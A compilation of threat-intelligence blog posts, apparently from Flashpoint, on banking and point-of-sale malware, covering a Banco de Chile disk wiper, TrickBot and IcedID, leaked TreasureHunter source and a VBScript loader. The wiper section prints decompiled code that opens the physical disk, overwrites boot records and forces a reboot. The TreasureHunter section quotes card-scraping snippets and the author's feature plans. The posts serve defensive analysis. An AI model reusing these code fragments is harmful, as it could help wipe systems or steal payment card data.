Banco de Chile ‘MBR Killler’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks

Wiper malware that may have destroyed as many as 9,000 workstations and 500 servers inside the Banco de Chile in a late-May attack has similarities to the Buhtrap malware component known as MBR Killer, leaked to the underground in February 2016.

Analysts at Flashpoint reverse-engineered the identified malware linked to the May 24 attack against the country’s largest financial institution, and said the malware is a modified version of a MBR Killer module known as kill_os. MBR Killer infections render the local operating system and the Master Boot Record unreadable.

According to bank officials, however, the wiper malware was just cover for a deeper attack against endpoints handling sensitive transactions and messaging over the SWIFT network. The SWIFT banking network, or the Society for Worldwide Interbank Financial Telecommunication, is the primary means of secure, reliable communications and money transfers between financial institutions.

On Sunday, Banco de Chile general manager Eduardo Ebensperger said in a statement that customer accounts were not affected, but critical processes such as branch services and telephone banking were impacted, as were executive offices and cashier personnel. Ebensperger told Chilean media outlet Pulso that $10 million was stolen and the stolen funds were filtered to entities in Hong Kong. He added that a forensic analysis conducted by Microsoft concluded this was an “international attack” and attributed it to either Eastern European or Asian groups.

Buhtrap malware and its components, including MBR Killer, were previously used in attacks against multiple Russian financial institutions, resulting in losses of 97 million rubles, or $1.23 million USD. The attacks in Russia forced one bank to disconnect from the Russian electronic payment system.

The attack in Chile comes on the heels of incidents affecting several banks in Mexico that use its Sistema de Pagos Electrónicos Interbancarios (SPEI) interbank transfer system, resulting in approximately $15.4 million USD in losses. In January, Flashpoint was aware of a separate malware attack targeting Mexican financial institutions that followed a pattern similar to previous attacks, with possible attribution to North Korean malware. Flashpoint was not able to analyze the malware targeting Mexican financial institutions, though the FBI associated the attack with North Korean malware. A report from El Financiero, a Mexican financial publication, following the January incident identified the attack as “FALLCHILL,” a North Korean remote administration tool (RAT) targeting aerospace, telecommunications, and financial organizations.

At this time, there does not appear to be a connection between attacks against Mexico’s banking institutions and the purported attack on Banco de Chile because the tactics, techniques, and procedures (TTP) used by the threat actors differ.

The similarities between the malicious code used in Chile and the leaked code from 2016 are in the use of the same NSIS script, below, in both instances. NSIS, or Nullsoft Scriptable Install System, is an open source system used to build Windows installers.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

By and large, the Buhtrap malware is complex and includes more than a dozen modules that give attackers the capability to install more malicious code, retain remote control over a compromised machine, and steal credentials among others. A list of available modules follows:

• “BHO”: a module designed to intercept and replace pages in the Internet Explorer browser.

• “kill_os”: a module designed to erase the MBR.

• “Loaders”: builders of NSIS scripts designed to install malware.

• “Mimimod”: a modified version of the “Mimikatz” program, used to obtain user credentials in the system.

• “ID”: an algorithm for obtaining the unique number of the infected machine.

• “BSShide”: a module designed to hide payment orders in the Business Support Systems (BSS). It modifies the page displayed to the user. SWIFT is part of the BSS.

• “Antidetekt”: a module designed to detect virtual environments and “sandboxes.”

• “UAC”: a module to bypass the User Account Control (UAC) protection.

• “RDP”: modifies the OS for the potential simultaneous operation of several users in the system.

• “VNC”: remote PC control with backconnect.

• “DLL Side-Loading”: used to install a keylogger and to provide communication with the control panel. Enables installation and operation of other modules in the system.

• “Control panel”: used to maintain visibility into infections and install additional modules to the infected host.

• “Builder”: a program designed to collect Trojan modules in one executable file.

• “MWI”: a collection of exploits, part of the “Microsoft Word Intruder” tool that was available on underground.

The Banco de Chile MBR Killer was also packed with VMProtect, meant to protect against forensic analysis and reverse engineering. Notably, the malware does not target victims based on locale or language; however, a Spanish language and locale check is present in the malware. The attribution behind the Banco de Chile attack remains uncertain; it is unclear if this code was simply reused by a copycat group or linked to the original group behind the Buhtrap malware. Originally, the kill_os module was leveraged to hide the evidence of successful bank network penetrations.

Banco De Chile: Malware Technical Analysis

The malware is packed with VMProtect/NSIS, and is executed via the System.dll in %TEMP%.

I. Main loop CreateFile API accessing \.PHYSICALDRIVE0:

Function main_loop_CreateFile
IntFmt $1 “\.PHYSICALDRIVE%D” $0
Push $0
StrCpy $0 $1
System::Call “KERNEL32::CREATEFILE(t, i, i, i, i, i, i) i (‘$0’, ${GENERIC_READ}|${GENERIC_WRITE}, ${FILE_SHARE_READ}|${FILE_SHARE_WRITE}, ${NULL}, ${OPEN_EXISTING}, ${FILE_ATTRIBUTE_NORMAL}, ${NULL}) .r2”
Pop $0
FunctionEnd

II. Master boot record setup:

!define
STMBR
‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i2) i’

III.MBR logical block addressing:

!define
STMBRLBA
‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i2) i’

IV. Volume boot record NTFS:

!define
STVBR_NTFS
‘(&i3, &i8, &i2, &i1, &i2, &i24, &i8, &i8, &i8, &i4) i’

V. Process NTFS boot:

Overwrite MBR
Overwrite Master File Table (MFT) mirror
Overwrite Volume Boot Record (VBR) mirror
Overwrite Extended Boot Record (EBR)
The following system API calls are used to overwrite the system:

${ForEach} $7 1 ${OVERWRITE_COUNT} + 1
System::Call “kernel32::SETFILEPOINTER(i, i, *p ,i) i (r2, r4, r3, ${FILE_BEGIN}) .r8”
${If} $8 <> -1
System::Call “kernel32::WRITEFILE(i, i, i, p, i) i (r2, r5, r9, r6, ${NULL})”
System::Call “kernel32::FlushFileBuffers(i) i (r2)”
${EndIf}

VI. Process protection malware from shutdown:

System::Call “KERNEL32::GETMODULEHANDLE(t) p (‘ntdll.dll’) .r0”
${If} $0 <> ${NULL}
System::Call “KERNEL32::GETPROCADDRESS(p, t) p (r0, ‘ZwClose’) .r1”
${If} $1 <> ${NULL}
System::Call “KERNEL32::VIRTUALPROTECT(p, i, i, *i) i (r1, 6, ${PAGE_EXECUTE_READWRITE}, .r2) .r0”
${If} $0 <> 0
System::Alloc 6
pop $3
System::Call “NTDLL::MEMCPY(p, p ,i) i (r3, r1, 6)”
System::Call “NTDLL::MEMCPY(p, t, i) i (r1, t ‘1′, 6)”
System::Call “KERNEL32::CLOSEHANDLE(i) i (0x12345678) .r4”
System::Call “NTDLL::MEMCPY(p, p, i) i (r1, r3, 6)”
System::Free $3

VII. System shutdown instruction:

ExitWindowsEx_EWX_REBOOT_
Push $1
StrCpy $1 ${EWX_REBOOT}|${EWX_FORCE}
System::Call “USER32::EXITWINDOWSEX(i, i) i ($1, ${SHTDN_REASON_MAJOR_SOFTWARE}|${SHTDN_REASON_MINOR_UPGRADE}) i .r0”
Pop $1
FunctionEnd

Possible action:

As the MBR Killer codebase was identical with minor modification to the Buhtrap simple MBR Killer, reviewing any mitigation against the Buhtrap malware might assist with mitigation exposure to this threat.
Review and mitigate for any malware execution from %TEMP% directory specifically if it calls “System.dll.”

To download the MBR Killer indicators of compromise (IOCs), click here.

The post Banco de Chile ‘MBR Killler’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Targeting Popular Job Recruitment Portals About More Than PII

Job listing and recruitment portals have been an attraction for cybercriminals given the volume of personal information uploaded to those sites in the form of resumes, cover letters and other data specific to individuals.

But there’s more to criminals’ interest than just stealing personally identifiable information. Security shortcomings on some of these sites can expose job applicants, business account holders and the recruiters themselves to a number of different threats. For example, when threat actors gain access to legitimate business accounts at recruiting sites they can use social engineering to con job seekers into replying to phony listings and are inadvertently recruited as money mules, or are lured into money laundering operations. Malicious documents in the guise of a PDF’d application can also slip past lax or non-existent scanning tools and target the recruitment portal directly, or enable an attacker access to data stored on the portal and expose applicants to identity theft.

Flashpoint analysts have noticed a marginal increase in the number of mentions on Deep & Dark Web forums related to such activity around recruitment portals, many of which involve advertisements for the availability of compromised accounts, or criminals soliciting business accounts in order to list jobs on the platforms. Attackers want access to business accounts in order to leverage their phony job listings and recruit people who would ultimately participate in fraud without their knowledge.

It’s likely that most of the recruitment portals are either unaware of such activity, or hesitant to disclose it, meaning that analysts may not have a true handle on the full scope of the problem. Given the increasing number of mentions and interest in abusing these platforms, threat actors may find this to be a useful tactic going forward.

The recruitment of unwitting mules is a growing problem on a number of online platforms that accept classified ads, but most prominently on job recruitment portals. Desperate for employment, a candidate may think they’re applying for a legitimate position. In actuality, the nonexistent positions—typically for merchandise handlers or payment processors—are a means of recruiting unwitting applicants into performing activity that facilitates fraud schemes, such as money laundering, by receiving unauthorized transfers of funds and sending the funds on to other recipients, typically for a nominal fee, frequently 10% of the amount they receive. The applicants are likely to believe the position is more credible if it is posted by a reputable company on a popular recruitment platform.

The phony job solicitations are professionally written and appear legitimate to casual observers and at times to the actual business, who may have numerous satellite campuses and could be unaware of where a local office or contractor could be listing a job.

When it comes to targeting recruitment professionals, Flashpoint analysts have observed that threat actors typically target such employees via email phishing campaigns, rather than attack the recruitment portals given the continued relevant success of phishing schemes. Credential stuffing, or account checking attacks, are more viable when targeting recruitment portal accounts. Credential stuffing attacks leverage the hundreds of millions of breached and leaked credentials available on the Deep & Dark Web (DDW) and the surface web to gain unauthorized access to accounts. Attackers use automated login requests to repeatedly try username-password combinations until they gain access to an account; it’s a tactic that could have its advantages over using malware-laced PDF documents that may never be downloaded, or could be flagged by a scanner.

Job recruitment portals are a warehouse of personal information, and by successfully compromising an applicant’s or recruiter’s account, criminals are able to harvest applicants’ PII, execute social engineering attacks that lead to identity theft, or recruit unwitting mules for fraud.

Flashpoint recommends the following mitigation advice for recruiters and platforms:

• Recruiters should always utilize the document parsers that many recruitment platforms have to avoid being infected by malicious documents.

• Recruiters should enforce employees’ usage of the recruitment platforms, rather than passing around PDF resumes and cover letters

• Require proper document virus scanning

• Secure accounts with unique passwords and two-factor authentication in order to deter account takeover.

• Recruiters should work with internal security teams to do cursory research across recruitment sites for fraudulent listings

• Recruitment portals should implement various security checks that analyze malicious documents and URLs for malicious activity.

• Recruitment portals should always advise users of the risk of accepting third-party documents.

The post Targeting Popular Job Recruitment Portals About More Than PII appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trickbot and IcedID Botnet Operators Collaborate to Increase Impact

Different banking malware operations previously competed for victims, often seeking out and uninstalling one another upon compromising machines; for example, the SpyEye malware would uninstall Zeus upon infection. Now, in what may indicate a shift toward more collaboration among cybercrime groups, the operators of the IcedID and TrickBot banking Trojans appear to have partnered and are likely sharing profits, based on operation details.

The clincher came when analysts at Flashpoint recently examined samples that indicate computers infected with IcedID are also downloading Trickbot, a prolific piece of malware considered to be the successor to the Dyre banking Trojan.

Researchers first spotted IcedID in November 2017; IBM’s X-Force research team published a report claiming to have spotted spotted this new banking malware spreading via massive spam campaigns. Compromised computers were first infected with the Emotet downloader, which then grabbed IcedID from the attacker’s domain; the Russian-speaking cybercriminals behind Emotet are believed to be comprised of some of the operators of the Dridex banking Trojan. IcedID is able to maintain persistence on infected machines, and it has targeted companies mainly in the financial services, retail, and technology sectors.

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

It appears that attackers now send IcedID directly as spam, and that piece of malware acts as a downloader that installs TrickBot, which in turn installs other modules on victims’ machines.

While it is typically unusual to find two different malware families infecting the same machine, Flashpoint analysts have determined through source intelligence with knowledge of both parties’ operations that there are indications of extensive collaboration between these two fraud operators. Human fraudsters are central to this cybercrime model; the TrickBot operators, for example, leverage automated attacks and knowledgeable fraud operators who review compromised data from victims’ machines and can carry out real-time account takeover (ATO) operations.

Trickbot and IcedID Fraud Master Collaboration: Monetization Funnel

Even the most sophisticated cybercriminal organization cannot reap financial rewards without the human resources required to cash out victims’ bank accounts. Cybercriminals’ ability to profit from the products and services involved in financial fraud rests on the availability of fraud masters, money mules, and related services.

The TrickBot and IcedID collaboration gives this pairing significant capabilities. First, the attacks are complex; while the malware’s main capabilities are its use of token grabbers, redirection attacks, and webinjects to steal banking credentials, there are other modules at the operators’ disposal that allow them to have deep coverage of a victim’s machine and expand the breadth and scope of an attack, thereby allowing them to derive additional potential sources of profit from a successful compromise.

Key to this complete coverage is the ability to carry out account checking, or credential stuffing, in order to determine the value of a victim’s machine and their access. Attackers can leverage higher value targets for network penetration, for example, while attackers can use other compromised targets for cryptocurrency mining.

IcedID has been in the wild since April 2017 and was originally known as BokBot; this malware is exclusively a threat to Windows. Emotet was associated with this malware, and operators used it mainly as a loader and to maintain persistence in order to install and execute additional malware, including a virtual network computing (VNC) module for remote management and an antimalware bypass module. IcedID creates proxies that are used to steal credentials for a host of websites that are mainly in financial services, though some sites also correspond to the retail and technology sector. The local proxy intercepts traffic and uses a webinject that steals login data from the victim.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

TrickBot targets victims in a wide swathe of industries by leveraging multiple modules, including leaked exploits, and targets victims for various malicious activities, such as cryptocurrency mining and ATO operations.

Central Command

Linguistic analysis and an investigation into TrickBot and IcedID botnet operations reveals that the campaign involving a botnet belongs to a small group that commissions or buys the banking malware, manages the flow of infections, makes payments to the project’s affiliates (traffic herders, webmasters, mule handlers), and receives the laundered proceeds. Flashpoint assesses with high confidence that a head of operations likely oversees a complex network of actors who likely know each other only by aliases even after years of working together. Each segment of the ecosystem, the so-called affiliates, are specialists within their respective domains. While they are delivering value to the botnet owner, they act independently, employing their own closed networks to accomplish assigned tasks. The organizational complexity of these projects, along with the stringent security practices exercised by everyone throughout the supply chain, poses a significant challenge to investigations.

Role of Botmaster in Cybercrime Operations

The responsibility to monitor the botnet, or the sum total of all victims’ online activities, falls on the TrickBot and IcedID botmaster. A bot’s activity is recorded in the command-and-control (C2) database according to the parameters specified in the control panel’s preferences. The botmaster also accepts XMPP or Jabber notifications via the “jabber_on” field in the backend when the victims log in to the banking page of interest. The botmaster then provides a message for the fraud masters once the login is recorded. The message reads, “Try to log in with: Login AND passcode: at this url: <bank_login_url.”

The botmaster may elect to receive notifications when a victim accesses only certain online banking applications. If, for example, the project is built around European or US financial institutions (possibly because that is where the syndicate’s money laundering capabilities are focused), they would receive Jabber notifications based on their geographical cash out preference.

The botmaster decodes the logs and parses them for the needed content. Exported logs may contain tens of millions of lines of data, so a botmaster will likely employ a parsing application to extract the relevant data. Advanced banking Trojans such as Citadel have a built-in log parser. Once information consisting of the victim’s login credentials, answers to the secret questions, and email address is extracted from the logs, it is passed on to an affiliate who manages real-world operations.

Geographical disparity presents an obstacle in monetizing access, though this issue is typically solved through the use of money mule (or drop) services. Mules open bank accounts in the geographic location of the victim and at the same financial institution. They receive fraudulent account clearing house (ACH) and wire transfers into their account and forward the proceeds to the botnet owner or the intermediary. Higher up the chain, mule handlers direct mule recruiting and money laundering activities at a range of locations and financial institutions; many mule handlers advertise their services on the cybercrime forums.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Based on the close collaboration between TrickBot and IcedID operators and their shared backend infrastructure, it is likely that the operators will likely continue to closely collaborate on cashing out stolen accounts.

Such collaboration may also signal that fraud masters and malware developers are continuing to foster collaborative fraud operations targeting corporations in an attempt to bypass the latest anti-fraud measures.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Attachments and Downloads

To download the Indicators of Compromise (IOCs) for TrickBot and IcedID, click here.

To download the Snort rule, click here.

The post Trickbot and IcedID Botnet Operators Collaborate to Increase Impact appeared first on Flashpoint.

Go to Source
Author: Flashpoint

TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked

The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.

The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.

Point-of-sale malware has been at the root of many breaches, including massive thefts at retailers Target in 2013 and Home Depot in 2014; in each case attackers were able to extract more than 100 million payment card and customer records from point-of-sale terminals by scraping card data before it was encrypted and sent to the payment processor. Both retail giants paid tens of millions of dollars in settlements, and in Target’s case, its chief executive officer resigned his position.

Industry Collaboration on Detection and Prevention

TreasureHunter has been known and investigated since 2014, but until now investigators have had to reverse-engineer its code in order to analyze it. Now with the full code available, analysts have previously unseen insight into the malware’s operation. Flashpoint analysts, who discovered the source code leak in March, proactively collaborated with researchers at Cisco Talos, who reviewed and improved protections, and advanced-detection mechanisms, in an effort to disrupt potential copycats who may have their hands on the source code.

In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code. Notably, the original developer appears to be a Russian speaker who is proficient in English. Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.

A graphical representation of a typical cybercrime dump shop ecosystem.

Image 1: A graphical representation of a typical cybercrime dump shop ecosystem.

One Leak Can Spawn Many Variants

TreasureHunter behaves like many other point-of-sale malware samples. Once an attacker has access to a Windows-based server and the point-of-sale terminal, the malware is installed and it establishes persistence by creating a registry key that runs the malware at startup. It then enumerates running processes, and scans device memory looking for track data, including primary account numbers (PANs), separators, service codes, and more. It then establishes a connection with the attacker’s command and control server and sends the stolen data to the criminal.

The leak of the builder adds another dimension to the availability of the TreasureHunter payload and configurations. In the past, malware source code leaks such as the Zeus banking Trojan have spawned numerous variants, including Citadel, which cost organizations hundreds of millions in losses. PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware which led to the creation of the ProPoS and Katrina variants. The actor behind the TreasureHunter leak said:

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs ( not at a very high rate, but it still does ) and besides that , since now you have the source code, it can be update anytime for your own needs.”

For researchers, the availability of the source code opens the door into new avenues of analysis and proactive visibility into such activity on the underground. This affords organizations such as Flashpoint the ability to collaborate with others in the industry such as Cisco Talos in this case to improve existing protections and force attackers back to the drawing board.

Source-Code Level Insight

The code project appears to be called internally trhutt34C, and was written in pure C with no C++ features. It was compiled originally in Visual Studio 2013 on Windows XP. Based on analysis, researchers believe the developer intended to improve and redesign various features including anti-debugging, code structure improvement, and gate communication logic. With the goal of additional features to be improved, the developer hoped frustrate malware analysis and subsequent research; the actor left behind a note that said: “We want the malware researchers screamin’!”

A snapshot of the TreasureHunter source code.

Image 2: A snapshot of the TreasureHunter source code.

The unfinished project included continued improvement code snippets, below:

  • TO DO for the next version of the client (0.2 Beta):
    • Replace all Unicode versions of functions with ANSI versions. Now why did I ever go for wide-char in the first place?..
  • Improve the code structure:
    • Replace all the if – else constructs that are rendered needless by return commands;
    • Organize the includes;
    • Give the code proper commenting so that I am able to modify and improve it after not having seen it for some time (if such a thing happens).
    • Make scan exceptions and service codes configurable.
    • Add the following commands to the gate communication logic:
    • Download and execute for updating;
    • Remote CMD command execution;
    • Remote self-removal for emergency cases.
    • Add anti-debugging:
      • Use self-debugging by creating a child process (may be improved later by reversing the tables);
      • Improve the MD5 function and use it to find debuggers by signatures (maybe to be added in future versions);
      • Use GetTickCount to detect parts of code being stepped through (maybe to be added in a “heuristical” joint algorithm with the abovementioned);
      • Upon finding a debugger, destroy the critical section and/or start creating new threads infinitely until the application crashes.
      • Maybe also kill processes and delete debuggers and/or decompilers permanently. We want the malware researchers screamin’!
  • Add better persistency and timeouts to gate communication.
  • Add local saving of data if the gate can’t be reached for a certain period of time.
  • Add the option to run the program as a service on Windows XP.
  • Improve the code structure and add comments to avoid future confusion.
  • Add error handling and backup restart in case of crash or heap overflow (malloc fail).
  • Improve the Clingfish system (so that a clingfish thread doesn’t do the same thing as the main thread right after being spawned).
  • Debug the system information extraction mechanism further (on different OS versions).
  • Improve the track-finding algorithm to make it faster.

The stolen dump structure is as follows. The structure contains the following key elements used to collect and operate with stolen dumps, such as unique machine information and where scraped data is from:

typedef struct dumpsHolder {
TCHAR *lpFileName;
int lpFileNameLength;
int procID;
char *trackArr;
int trackArrLength;
} dumpsHolder;

The credit card process scan works in exception mode:

char *scanExceptions[SCANEXCEPTIONSNUM] = {“System32”, “SysWOW64”, “\Windows\explorer.exe”};

The malware focuses on scraping credit card track data, focusing on the following service codes:

char *serviceCodes[SERVICECODESNUM] = {“101”, “201”, “121”, “231”, “221”, “110”};

Registry persistence for autostart in HKLMMicrosoftWindowsCurrentVersionRun runs as “jucheck.”

A registry key created by the malware for persistence

Image 3: A registry key created by the malware for persistence.

The source code is consistent with the various samples that have been seen in the wild over the last few years. TreasureHunterconfig.h shows definite signs of modification over the lifespan of the malware. Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER to be overwritten by the builder. More recent samples, and the source code, instead writes useful config values directly into the fields. This makes the samples slightly smaller and uses fresh compiles to create reconfigured files.

The post TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked appeared first on Flashpoint.

Go to Source
Author: Flashpoint

RAT Gone Rogue: Meet ARS VBS Loader

Malicious VBScript has long been a fixture of spam and phishing campaigns, but until recently its functionality has been limited to downloading malware from an attacker-controlled server and executing it on a compromised computer.

Researchers at Flashpoint have seen and analyzed a unique departure from this norm in ARS VBS Loader, a spin-off of a popular downloader called SafeLoader VBS that was sold and eventually leaked in 2015 on Russian crimeware forums.

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious “loaders”, i.e. initial infection vector malware families used to install subsequent payloads.

Image 1: ARS VBS Loader's administrative login portal.

Image 1: ARS VBS Loader’s administrative login portal.

The new loader has been spammed out in email attachments enticing victims with lures in subject lines related to personal banking, package shipments, and toll road notifications. Should a victim interact with the attachment and launch it, analysts say numerous types of commodity malware could be installed, including the AZORult information-stealing malware. AZORult was also used in campaigns targeting more than 1,000 Magento admin panels; in those attacks, the malware was used to scrape payment card information from sites running the popular free and open source ecommerce platform.

ARS VBS Loader targets only Windows machines and supports Windows 10, according to posts to a Russian-speaking forum going back to December. Previously, another loader called FUD ASPC Loader, first advertised in May 2017, contained similar functionality but not Windows 10 support.

The loader is also likely to side-step detection by signature-based antivirus and intrusion detection systems because of the relative ease in which attackers can obfuscate VBScript, Flashpoint analysts said. Obfuscation through a variety of means allows attackers to hide malware; if the malware is obfuscated with encryption or packing, it’s exponentially more difficult for antivirus to sniff out malicious code, for example.

Once the ARS VBS Loader executes on a victim’s computer, it immediately creates a number of entries in nearly a dozen autorun locations, including registry, scheduled tasks, and the startup folder, ensuring persistence through reboots. ARS VBS Loader will connect to the attacker’s server, sending it system information such as the operating system version name, computer user name, RAM, processor and graphics card information, a randomly generated ID for infection tracking, and machine architecture information.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

The botmaster, meanwhile, can remotely administer commands to bots through the PHP command-and-control application. Communication with the command-and-control server is carried out in plaintext over HTTP, making it easy to spot, Flashpoint analysts said.
The malicious code that runs on the victim’s machine is written entirely in VBScript and contains functionality for updating and deleting itself, and deploying plugins such as a credentials stealer, or launching application-layer denial-of-service (DoS) attacks against websites, and loading additional malware from external websites.

The most common command spotted by analysts is download, which instructs bots to download and execute malware from a supplied URL. There is also the plugin command where plugins that steal passwords or capture desktop screenshots can be pushed to compromised computers.

The DDoS command is also noteworthy because it’s a unique capability; analysts said they have not seen this command used in the wild. The command tells bots to send a specified amount of HTTP POST requests to a particular URL. Since this is a simple application layer flooding attack, it is currently unknown how successful this attack would be against targets in the wild, analysts said, adding that it would be easy to spot such traffic because the same hardcoded POST values are sent in the HTTP flood.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Analysts caution that users should be vigilant about not opening email attachments from unknown sources, and that it’s likely ARS VBS Loader will continue to be an effective initial infection vector for spam campaigns.

To download the indicators of compromise (IOCs) for the ARS VBS Loader, click here.

To download the Yara rule for the ARS VBS Loader, click here.

The post RAT Gone Rogue: Meet ARS VBS Loader appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Compromised Magento Sites Delivering Malware

Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.

Researchers at Flashpoint are aware of the compromise of at least 1,000 Magento admin panels, and said that interest in the platform has continued unabated on entry-level and top-tier Deep & Dark Web forums since 2016. Attackers have also demonstrated continued interest in other popular ecommerce-processing content management systems such as Powerfront CMS and OpenCart.

The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials. Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access of the panels.

Once the attacker has control of the site’s Magento CMS admin panel, they have unfettered access to the site and the ability to add any script they choose. In this case, the attackers were injecting malicious code in the Magento core file, allowing them access to pages where payment data is processed. POST requests to the server containing sensitive data are then intercepted and redirected to the attacker.

Flashpoint analysts said the compromised sites return an exploit in the form of a phony Adobe Flash Player update, which if launched by the user runs malicious JavaScript that downloads malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner. The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.

Image 1: Anatomy of the attack.

Image 1: Anatomy of the attack.

Flashpoint said that most of the victims among the 1,000 panels it is aware of are in the education and healthcare industries, and that the IP addresses of the compromised panels map to locations in the United States and Europe.

Analysts assess that this is likely only a set of a larger sample of compromised Magento panels.

Flashpoint is working with law enforcement to notify victims of these compromises.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

In the meantime, the rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords. The compromised IoT devices were corralled into a massive botnet that was pointed at a number of high-value targets including DNS provider Dyn, French webhost OVH, and journalist Brian Krebs’ website in order to carry out crippling distributed denial-of-service attacks. The DDoS attack against Dyn peaked at 1 terabyte-per-second and took a number of popular websites and services offline for the better part of day in October 2016, including Twitter, Spotify and GitHub.

Magento admins are advised to review CMS account logins and mitigate their exposure to brute-force attacks by enforcing the following password-hygiene practices:

  • Enforce organizational password complexity requirements.
  • Restrict users from recycling previously used passwords.
  • Enable two-factor authentication for sensitive systems, applications, databases, and remote access solutions.
  • Supply users with secure password managers to assist with password requirements.

The indicators of compromise (IOCs) for AZORult, Rarog, and the campaign targeting Magento are available for download here. The Yara rule is available for download here.

The post Compromised Magento Sites Delivering Malware appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model

Individuals who reuse login credentials across multiple sites are more susceptible to account checking attacks, which occur when threat actors use credentials stolen from past database breaches or compromises to gain unauthorized access to other accounts belonging to the same victims. However, the process of mining compromised data for correct username and password combinations requires significant computer processing power and proxy pool lists to be successful — a capability that is now exhibited by the Trickbot gang.

Considered to be the successor of the formidable Dyre banking Trojan gang, the Trickbot banking Trojan gang continues to evolve by adopting new attack methods and targeting various industries. While Trickbot predominantly targeted the financial industry, it has now expanded its targeting of other industries via its account checking activities; these are perpetrated through the backconnect SOCKS5 module enlisting victims as proxies. Enlisting victims as its proxies allows the gang to perform account checking activity with the same IP as its victims. The gang account checking operation requires a steady stream of new and “clean” proxies to make sure their activities wouldn’t get automatically blocked by companies’ automatic IP origin anti-fraud systems. Therefore, their existing infections are turned into account checking proxies.

Image 1: The process of Trickbot’s backconnect proxy account checking activity. In the first step, the Trickbot gang distributes email spam. In the second step, the victim opens the spam attachment. In the third step, Trickbot downloads and executes the payload from the payload server on the compromised machine. In the fourth step, the victim machine downloads the backconnect SOCKS5 proxy module from the module server. Then, the victim connects to the preconfigured gang’s backconnect server. Finally, the Trickbot gang connects to the victim enlisting their machine’s IP as its proxy for account checking activities via its backconnect SOCKS5 module.

The Trickbot gang continues to search for ways to monetize infections by adopting a hybrid attack model, which utilizes both Trickbot modular payloads and knowledgeable fraud operators. The Trickbot gang has also extended its operations to include account checking activity; such attacks are a combination of malware expertise and knowledgeable human operators. This hybrid approach allows Trickbot operators to launch account checking attacks leveraging infected victims as proxies.

Distributed through malicious Microsoft Office documents via email spam campaigns, Trickbot is notable for loading its backconnect SOCKS5 module bcClientDllTest onto compromised machines. This module is used extensively by the gang for account checking activity.

From Aug. 17 to the present, analysts observed close to 6,000 unique compromised machines associated with Trickbot SOCKS5 proxy module activities. Of these machines, more than 200 of them were actively enlisted for account checking fraud activities at any one time.

Image 2: The Trickbot SOCKS5 backconnect module contains authorization backconnect logic to check in to the backend.

